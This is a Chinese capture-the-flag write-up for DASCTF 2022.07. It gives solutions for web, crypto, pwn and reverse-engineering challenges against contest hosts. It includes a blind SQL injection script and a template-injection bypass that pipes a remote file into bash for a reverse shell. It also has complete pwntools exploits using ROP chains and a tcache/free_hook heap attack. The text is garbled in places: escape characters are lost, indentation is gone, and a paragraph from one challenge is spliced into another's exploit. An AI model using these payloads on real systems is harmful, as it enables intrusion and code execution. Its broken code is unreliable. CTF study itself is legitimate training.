Ez to getflag
打开题目在搜索框里/flag得到flag
绝对防御
在static/alerttip.js路径里找到可疑文件路径,访问
查看js源码发现可传参id
着传一下,发现id=1是admin,id=2是flag,猜想可能跟有sql
注入,简单测试一些确实存在sql注入
前端存在过滤:
var reg = /[`~!@#$%^&*()_+<>?:"{},./;'[]]/im;
跑一下fuzz发现后端过滤了if,union,sleep等函数
尝试盲注:
id=1 and ascii(substr((select database()),1,1))>127
盲注成功
编写脚本跑出flag
import re
import requests as req
import time
url = "http://d7e72ae0-ae63-4970-bb3c-ef75591b9cd5.node4.buuoj.cn:81/SUPPERAPI.php?"
payload = f"id=1 and ascii(substr((select database()),1,1))>127"
res = ''
for i in range(50):
low = 0x20
high = 0x7f
while(low <= high):
mid = (high + low) // 2
print(low, mid, high)
#payload = f"id=1 and ascii(substr((select group_concat(column_name) from
information_schema.columns where table_name='users'),{i},1))>{mid}"
#payload = f"id=1 and ascii(substr(reverse((select password from users where
id=2)),{i},1))>{mid}"
payload = f"id=1 and ascii(substr((select password from users where id=2),{i},1))>{mid}"
# 数据库 database()
# 表名 users
# 字段 id,username,password
#flag在id为2的password中
print(payload)
response = req.get(url + payload)
#print(response.text)
if(len(response.text) > 587):
low = mid + 1
else:
high = mid - 1
print("[+]:",low, res)
time.sleep(1)
res += chr(low)
print("[+]:",low, res)
print(res)
Harddisk
打开题目只发现一个输入框,查看源码没有异样,直接抓包发现可控参数nickname
多次测试回显后判断是模板注入,
跑一下fuzz,以下内容都被过滤了
{{、点、_、[]、空格等字符,还过滤了一些如class等关键字或组成关键字的字母
想办法绕过,由于点被过滤,这里使用attr进行绕过,拼接构造bash反弹shell
{%if(xxx|attr("__init__")|attr("__globals__")|attr("__getitem__")|attr("__builtins__")|attr("__getitem__")("eval")("__import__('os').popen('curl vps/1.txt|bash').read()")))%}1{%endif%}
(提前写好1.txt的内容)
对attr内的内容进行8进制编码得到payload:
nickname={%25if(xxx|attr("137137151156151164137137")|attr("137137147154157142141154163137137")|attr("137137147145164151164145155137137")("137137142165151154164151156163137137")|attr("137137147145164151164145155137137")("13713715115516015716216413713750471571634751561601571601451565047143165162154401661601635761561641701641741421411631504751561621451411445051"))%25}1{%25endif%25}
监听2333端口发包服务器得到shell,ls发现根目录存在文件f1agggghere
Cat得到flag
Babysign
ecdsa签名,k泄漏,有msg算其hash值,可求私钥x
x≡r-1(ks- H(m))mod n
import hashlib
import gmpy2
import ecdsa
import libnum
r=0x7b35712a50d463ac5acf7af1675b4b63ba0da23b6452023afddd58d4891ef6e5
s=0xa452fc44cc36fa6964d1b4f47392ff0a91350cfd58f11a4645c084d56e387e5c
k=57872441580840888721108499129165088876046881204464784483281653404168342111855
msg = b'welcome to ecdsa'
msg = int(hashlib.sha256(msg).hexdigest(), 16)
gen = ecdsa.NIST256p.generator
n = gen.order()
print(n)
x=int((gmpy2.invert(r, n)*(k*s-msg)) % n)
print(libnum.n2s(x)) # 11b7311d4f0137074a7256d3eb82f368
# sage
DASCTF{ 11b7311d4f0137074a7256d3eb82f368}
NTRURSA
1、多项式RSA解出h
2、对于NTRU参数,用LLL求g1
3、遍历rand异或出n的因子g
4、常规RSA求解出flag
# sage
import gmpy2, libnum
p = 64621
S.
N = 25081*x^175 + 8744*x^174 + 9823*x^173 + 9037*x^172 + 6343*x^171 + 42205*x^170 +
28573*x^169 + 55714*x^168 + 17287*x^167 + 11229*x^166 + 42630*x^165 + 64363*x^164 +
50759*x^163 + 3368*x^162 + 20900*x^161 + 55947*x^160 + 7082*x^159 + 23171*x^158 +
48510*x^157 + 20013*x^156 + 16798*x^155 + 60438*x^154 + 58779*x^153 + 9289*x^152 +
10623*x^151 + 1085*x^150 + 23473*x^149 + 13795*x^148 + 2071*x^147 + 31515*x^146 +
42832*x^145 + 38152*x^144 + 37559*x^143 + 47653*x^142 + 37371*x^141 + 39128*x^140 +
48750*x^139 + 16638*x^138 + 60320*x^137 + 56224*x^136 + 41870*x^135 + 63961*x^134 +
47574*x^133 + 63954*x^132 + 9668*x^131 + 62360*x^130 + 15244*x^129 + 20599*x^128 +
28704*x^127 + 26857*x^126 + 34885*x^125 + 33107*x^124 + 17693*x^123 + 52753*x^122 +
60744*x^121 + 21305*x^120 + 63785*x^119 + 54400*x^118 + 17812*x^117 + 64549*x^116 +
20035*x^115 + 37567*x^114 + 38607*x^113 + 32783*x^112 + 24385*x^111 + 5387*x^110 +
5134*x^109 + 45893*x^108 + 58307*x^107 + 33821*x^106 + 54902*x^105 + 14236*x^104 +
58044*x^103 + 41257*x^102 + 46881*x^101 + 42834*x^100 + 1693*x^99 + 46058*x^98 +
15636*x^97 + 27111*x^96 + 3158*x^95 + 41012*x^94 + 26028*x^93 + 3576*x^92 + 37958*x^91
+ 33273*x^90 + 60228*x^89 + 41229*x^88 + 11232*x^87 + 12635*x^86 + 17942*x^85 + 4*x^84
+ 25397*x^83 + 63526*x^82 + 54872*x^81 + 40318*x^80 + 37498*x^79 + 52182*x^78 +
48817*x^77 + 10763*x^76 + 46542*x^75 + 36060*x^74 + 49972*x^73 + 63603*x^72 +
46506*x^71 + 44788*x^70 + 44905*x^69 + 46112*x^68 + 5297*x^67 + 26440*x^66 + 28470*x^65
+ 15525*x^64 + 11566*x^63 + 15781*x^62 + 36098*x^61 + 44402*x^60 + 55331*x^59 +
61583*x^58 + 16406*x^57 + 59089*x^56 + 53161*x^55 + 43695*x^54 + 49580*x^53 +
62685*x^52 + 31447*x^51 + 26755*x^50 + 14810*x^49 + 3281*x^48 + 27371*x^47 + 53392*x^46
+ 2648*x^45 + 10095*x^44 + 25977*x^43 + 22912*x^42 + 41278*x^41 + 33236*x^40 +
57792*x^39 + 7169*x^38 + 29250*x^37 + 16906*x^36 + 4436*x^35 + 2729*x^34 + 29736*x^33 +
19383*x^32 + 11921*x^31 + 26075*x^30 + 54616*x^29 + 739*x^28 + 38509*x^27 + 19118*x^26
+ 20062*x^25 + 21280*x^24 + 12594*x^23 + 14974*x^22 + 27795*x^21 + 54107*x^20 +
1890*x^19 + 13410*x^18 + 5381*x^17 + 19500*x^16 + 47481*x^15 + 58488*x^14 + 26433*x^13
+ 37803*x^12 + 60232*x^11 + 34772*x^10 + 1505*x^9 + 63760*x^8 + 20890*x^7 + 41533*x^6 +
16130*x^5 + 29769*x^4 + 49142*x^3 + 64184*x^2 + 55443*x + 45925
e = 65537
C = 19921*x^174 + 49192*x^173 + 18894*x^172 + 61121*x^171 + 50271*x^170 + 11860*x^169 +
53128*x^168 + 38658*x^167 + 14191*x^166 + 9671*x^165 + 40879*x^164 + 15187*x^163 +
33523*x^162 + 62270*x^161 + 64211*x^160 + 54518*x^159 + 50446*x^158 + 2597*x^157 +
32216*x^156 + 10500*x^155 + 63276*x^154 + 27916*x^153 + 55316*x^152 + 30898*x^151 +
43706*x^150 + 5734*x^149 + 35616*x^148 + 14288*x^147 + 18282*x^146 + 22788*x^145 +
48188*x^144 + 34176*x^143 + 55952*x^142 + 9578*x^141 + 9177*x^140 + 22083*x^139 +
14586*x^138 + 9748*x^137 + 21118*x^136 + 155*x^135 + 64224*x^134 + 18193*x^133 +
33732*x^132 + 38135*x^131 + 51992*x^130 + 8203*x^129 + 8538*x^128 + 55203*x^127 +
5003*x^126 + 2009*x^125 + 45023*x^124 + 12311*x^123 + 21428*x^122 + 24110*x^121 +
43537*x^120 + 21885*x^119 + 50212*x^118 + 40445*x^117 + 17768*x^116 + 46616*x^115 +
4771*x^114 + 20903*x^113 + 47764*x^112 + 13056*x^111 + 50837*x^110 + 22313*x^109 +
39698*x^108 + 60377*x^107 + 59357*x^106 + 24051*x^105 + 5888*x^104 + 29414*x^103 +
31726*x^102 + 4906*x^101 + 23968*x^100 + 52360*x^99 + 58063*x^98 + 706*x^97 +
31420*x^96 + 62468*x^95 + 18557*x^94 + 1498*x^93 + 17590*x^92 + 62990*x^91 + 27200*x^90
+ 7052*x^89 + 39117*x^88 + 46944*x^87 + 45535*x^86 + 28092*x^85 + 1981*x^84 + 4377*x^83
+ 34419*x^82 + 33754*x^81 + 2640*x^80 + 44427*x^79 + 32179*x^78 + 57721*x^77 +
9444*x^76 + 49374*x^75 + 21288*x^74 + 44098*x^73 + 57744*x^72 + 63457*x^71 + 43300*x^70
+ 1508*x^69 + 13775*x^68 + 23197*x^67 + 43070*x^66 + 20751*x^65 + 47479*x^64 +
18496*x^63 + 53392*x^62 + 10387*x^61 + 2317*x^60 + 57492*x^59 + 25441*x^58 + 52532*x^57
+ 27150*x^56 + 33788*x^55 + 43371*x^54 + 30972*x^53 + 39583*x^52 + 36407*x^51 +
35564*x^50 + 44564*x^49 + 1505*x^48 + 47519*x^47 + 38695*x^46 + 43107*x^45 + 1676*x^44
+ 42057*x^43 + 49879*x^42 + 29083*x^41 + 42241*x^40 + 8853*x^39 + 33546*x^38 +
48954*x^37 + 30352*x^36 + 62020*x^35 + 39864*x^34 + 9519*x^33 + 24828*x^32 + 34696*x^31
+ 2387*x^30 + 27413*x^29 + 55829*x^28 + 40217*x^27 + 30205*x^26 + 42328*x^25 +
6210*x^24 + 52442*x^23 + 58495*x^22 + 2014*x^21 + 26452*x^20 + 33547*x^19 + 19840*x^18
+ 5995*x^17 + 16850*x^16 + 37855*x^15 + 7221*x^14 + 32200*x^13 + 8121*x^12 + 23767*x^11
+ 46563*x^10 + 51673*x^9 + 19372*x^8 + 4157*x^7 + 48421*x^6 + 41096*x^5 + 45735*x^4 +
53022*x^3 + 35475*x^2 + 47521*x + 27544
roots = factor(N)
P = roots[0][0]
Q = roots[1][0]
PHI = (p^P.degree()-1)*(p^Q.degree()-1)
D = int(gmpy2.invert(e, PHI))
M = pow(C,D,N)
print(M)
hint = ''.join([str(i) for i in M])
print(hint)
h = int(hint)
p = 106472061241112922861460644342336453303928202010237284715354717630502168520267
v1 = vector(ZZ, [1, h])
v2 = vector(ZZ, [0, p])
m = matrix([v1,v2]);
f, g1 = m.LLL()[0]
print(f, g1)
n =
313981742035662292106655340941266013156830746410132054404765525843121128836382783901058
061279754062247831283400411293167825490098111964933196653360166909855578623675515454878
429048280512936138362759875958710046019689358666349555287755368474025817349107424037889
41725304146192149165731194199024154454952157531068881114411265538547462017207361362857
for rand in range(0, 2**20):
g = g1^^(rand)
if n % g == 0:
p = n//g
break
e = 65537
c =
209202471077384967840710502394225409362245771227212661410579575516037059729664572031778
124048968521109757683154648529622106485351302352984136115986586597771089200149296325313
074098858689418429218157350089813355822979757941080161512103944460098903120432591678069
81442425505200141283138318269058818777636637375101005540308736021976559495266332357714
phi = (g-1)*(p-1)
d = int(gmpy2.invert(e, phi))
m = int(pow(c, d, n))
print(libnum.n2s(m))
DASCTF{P01yn0m141RS4_W17h_NTRU}
easyNTRU
关注以下代码
from itertools import product
from Crypto.Hash import SHA3_256
from Crypto.Cipher import AES
N = 10
R.
c =
b'xb9Wx8cx8bx0cGxdex7flxf7x03xbb9mx0cxc4Lxfexe9Qxadxfdxda!x1axea@}Ux
9ay4x8axe3yxdfxd5BVxa7x06xf9x08x96="fxc1x1bxd7xdbxc1jx82Fx0bx16x06xb
cJMBxc8x80'
table = [-1, 0, 1]
for i in product(table, repeat=N):
m = R(list(i))
sha3 = SHA3_256.new()
key = sha3.update(bytes(str(m).encode('utf-8'))).digest()
tmp = AES.new(key, AES.MODE_ECB)
try:
flag = tmp.decrypt(c)
if b'DASCTF' in flag:
print(flag)
except:
pass
# b'DASCTF{b437acf4-aaf8-4f8f-ad84-
5b1824f5af9c}x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x
14x14'
发现作为AES加密的密钥,⻓度为10的m,每个值只有-1、1、0三种可能
可以爆破求解
DASCTF{b437acf4-aaf8-4f8f-ad84-5b1824f5af9c}
lwe?
读取好数据
将out文件里的双空格全替换改为了单空格,才写的代码
将x、y、z横着堆叠成 的矩阵,将A、B、C竖着堆叠成 的矩阵,发现是GGH
搜到babai的方法可忽略e,求出明文(跑了许久)
https://www.bnessy.com/archives/long-yuan-zhan--yi-2021writeup
按照uuid的格式拼写好flag
from sage.modules.free_module_integer import IntegerLattice
with open('tempdir/CRYPTO附件/LWE?/out.txt') as f:
data = (f.read()).split('=')
tmp_A = data[1][:-3].replace('n', '').replace(' ', ',').split(']')[:-1]
A = []
for i in range(len(tmp_A)):
if i == 0:
tmp = tmp_A[i][1:]+']'
else:
tmp = tmp_A[i]+']'
eval('A.append({0})'.format(tmp))
tmp_B = data[2][:-3].replace('n', '').replace(' ', ',').split(']')[:-1]
B = []
for i in range(len(tmp_B)):
if i == 0:
tmp = tmp_B[i][1:] + ']'
else:
tmp = tmp_B[i] + ']'
eval('B.append({0})'.format(tmp))
tmp_C = data[3][:-3].replace('n', '').replace(' ', ',').split(']')[:-1]
C = []
for i in range(len(tmp_C)):
if i == 0:
tmp = tmp_C[i][1:] + ']'
else:
tmp = tmp_C[i] + ']'
eval('C.append({0})'.format(tmp))
b = []
eval('b.append({0})'.format(data[4].replace('(','[').replace(')', ']')))
AA = []
for i in A:
AA.append(i)
for i in B:
AA.append(i)
for i in C:
AA.append(i)
b = b[0]
e = b
W = AA
e = vector(e)
W = matrix(W)
def babai(A, w):
A = A.LLL()
G = A.gram_schmidt()[0]
t = w
for i in reversed(range(A.nrows())):
c = ((t * G[i]) / (G[i] * G[i])).round()
t -= A[i] * c
return w - t
V = babai(W,e)
m = V/W
flag = [chr(i) for i in m]
print(flag)
m = ['O', 'h', ',', ' ', 'y', 'o', 'u', ' ', 'g', 'e', 't', ' ', 'i', 't', '?', '?', '
', 'H', 'e', 'r', 'e', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'f', 'l', 'a', 'g', ':',
' ', "'", 'D', 'A', 'S', 'C', 'T', 'F', '{', 'u', 'u', 'i', 'd', '}', "'", '.', ' ',
'W', 'h', 'a', 't', '?', ' ', 'Y', 'o', 'u', ' ', 'd', 'o', 'n', "'", 't', ' ', 'k',
'n', 'o', 'w', ' ', 't', 'h', 'e', ' ', 'u', 'u', 'i', 'd', '?', ' ', 'T', 'h', 'e', '
', 'f', 'i', 'r', 's', 't', ' ', 'p', 'a', 'r', 't', ' ', 'i', 's', ' ', "'", 'd', 'c',
'f', '4', '1', '5', '5', '6', "'", ',', ' ', 's', 'e', 'c', 'o', 'n', 'd', ' ', 'p',
'a', 'r', 't', '-', '>', ' ', "'", 'c', '1', '9', '4', "'", ',', ' ', 'a', 'n', 'd', '
', 't', 'h', 'e', 'n', ' ', "'", '4', 'c', '6', '6', "'", ',', ' ', "'", '9', '0', '9',
'2', "'", '.', ' ', 'A', 'n', 'd', ' ', 'f', 'i', 'n', 'a', 'l', 'l', 'y', ',', ' ',
'i', 't', "'", 's', ' ', "'", '0', '5', '9', 'e', '0', 'b', 'f', '8', 'b', '8', '4',
'e', "'", '!', '!', '!', ' ', '0', 'v', '0']
print(''.join(m))
DASCTF{dcf41556-c194-4c66-9092-059e0bf8b84e}
Eyfor
Ctypes绕过伪随机数,整数溢出,最后ret2libc2
ExP如下
from pwn import *
from ctypes import *
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
banary = "./pwn4"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26252
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)
context.log_level = "debug"
def debug():
gdb.attach(io)
pause()
s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"xff")[-4:].ljust(4, b'x00'))
uu64 = lambda : u64(io.recvuntil(b"x7f")[-6:].ljust(8, b"x00"))
lg = lambda addr : log.info(addr)
ia = lambda : io.interactive()
_flags = 0xfbad1800
seed = 10
sla(b'go', b"Leof")
for i in range(4):
buf = libc.rand()
sla(b'message:', str(buf))
sl(str(-1))
pop_rdi = 0x400983
buf = 0x6010C0
ret = 0x40063e
sys_addr = 0x400680
payload = b'/bin/shx00'
payload += b'x00' * (0x38 - len(payload)) + p64(pop_rdi) + p64(buf) + p64(ret)
+p64(sys_addr)
'''gdb.attach(io)
pause()'''
sl(payload)
ia()
MyCanary2
题目名字叫my_canary但checksec后,其实并没有canary。出题人自己实现了一个简易的canary,绕过主程序后面
的检查就可以了。然后无脑溢出就行了。
Exp如下
from pwn import *
from LibcSearcher import *
from ctypes import*
r = process("./mycanary")
r = remote('node4.buuoj.cn',27014)
e = ELF("./mycanary")
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
r.timeout = 0.5
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b''))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b''))
eyfor
ctypes绕过伪随机数,整数溢出,最后ret2libc2
exp
info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))
rdi = 0x0000000000400983
def dbg(cmd):
gdb.attach(r,cmd)
pause()
pop_rdi = 0x0000000000401613
ru(b'Input your choice')
sl(b'1')
ru(b'Show me the code:')
pl1 = b'a'*0x60 + p64(0)*3 + p64(pop_rdi) + p64(e.got['puts'])+ p64(e.plt['puts'])+
p64(0x40158A)
sl(pl1)
ru(b'Input your choice')
sl(b'2')
ru(b'Input your choice')
sl(b'3')
puts_addr = uu64(b'x7f') - 0x0875a0
leak('puts_addr',puts_addr)
sys = puts_addr +0x055410
sh = puts_addr + 0x1b75aa
ru(b'Input your choice')
sl(b'1')
ru(b'Show me the code:')
pl1 = b'a'*0x60 + p64(0)*3 + p64(0x000000000040101a) + p64(pop_rdi) + p64(sh)+
p64(sys)+ p64(0x40158A)
sl(pl1)
ru(b'Input your choice')
sl(b'2')
ru(b'Input your choice')
sl(b'3')
r.interactive()
compat
合理的控制tag,可以修改堆的控制结构,修改之后,可以泄露堆基地址和libc基地址,然后再次修改构造堆块重
叠,写tcache的fd为free_hook即可,然后getshell。
Exp如下
from pwn import *
from LibcSearcher import *
r = process("./compact")
r = remote('node4.buuoj.cn',27051)
e = ELF("./compact")
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
libc = e.libc
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b''))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b''))
info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))
def dbg(cmd):
gdb.attach(r,cmd)
pause()
def add(data,tag,desc):
ru(b'give me your choice:')
sl(b'1')
ru(b'data:')
sl(data)
ru(b'tag: ')
se(tag)
sl(desc)
def show(index):
ru(b'give me your choice:')
sl(b'2')
ru(b'idx: n')
sl(str(index).encode())
def delete(index):
ru(b'give me your choice:')
sl(b'3')
ru(b'idx: n')
sl(str(index).encode())
def reset():
ru(b'give me your choice:')
sl(b'4')
og = [0xe6aee,0xe6af1,0xe6af4]
#flag = 0x4060
#ptr = 0x40a0
add(b'aaaa',b'xff',b'a'*2) #0
delete(0)
reset()
add(b'aaaa',b'xff',b'a'*2)
show(0)
ru(b'aan')
heap_base = u64(rc(0x6).ljust(8,b'x00'))-0x2c0
leak('heap_base',heap_base)
num = (heap_base & 0xffff)
for i in range(7):
add(b'aaaa',b'xff',b'a'*2)
for i in range(7):
delete(7-i)
delete(0)
reset()
offest = num + 0x2c0
add(b'aaaa',b'xfc',b'a'*3 + p16(offest))
show(0)
libc_base = uu64(b'x7f') - 0x1ecbe0 + 0x1000
leak("libc_base",libc_base)
offest = num + 0x490
pl1 = b'a'*12 * 8 + p64(0) + p64(0x91)
add(pl1,b'xfc',b'a'*3 + p16(offest))
delete(1)
reset()
hook = libc_base + 0x1eeb28
shell = libc_base + og[1]
pl1 = b'a' * 0x18 + p64(0x21) + p64(heap_base+0x560) + p64(heap_base + 0x10) + p64(0) +
p64(0x91) + p64(hook)
add(pl1,b'xfc',b'a'*3 )
add(b'aaaa',b'xfc',b'a'*3 )
add(p64(shell),b'xfc',b'a'*3 )
delete(0)
reset()
r.interactive()
隐秘的⻆落
打开ida查看mian
是个go语言编写的elf文件,上面是关键加密地方,
貌似是直接调用了rc4的加密库文件
找到key是thisiskkk
动调之后找到加密的密文
Exp如下:
str = [0xFB, 0xC6, 0xA6, 0x9D, 0xC4, 0xDB, 0x7B, 0x56, 0xB6, 0x46,
0xA6, 0xC0, 0x85, 0x64, 0x7A, 0x9A, 0x37, 0x4C, 0x10, 0x96,
0xE9, 0xA7, 0x28, 0xC4, 0xB1, 0x2D, 0xF1, 0xDE, 0x47, 0x3B,
0xB5, 0xF3, 0x2C, 0x7D, 0x67, 0x1D]
print(str)
t = []
key = 'thisiskkk'
ch = ''
j = 0 # 初始化
s = list(range(256)) # 创建有序列表
for i in range(256):
j = (j + s[i] + ord(key[i % len(key)])) % 256
s[i], s[j] = s[j], s[i]
i = 0 # 初始化
j = 0 # 初始化
for r in str:
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
x = (s[i] + (s[j] % 256)) % 256
ch += chr(r ^ s[x])
print(ch)
原文始发于微信公众号(Drt安全战队):DASCTF2022.07赋能赛 部分WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论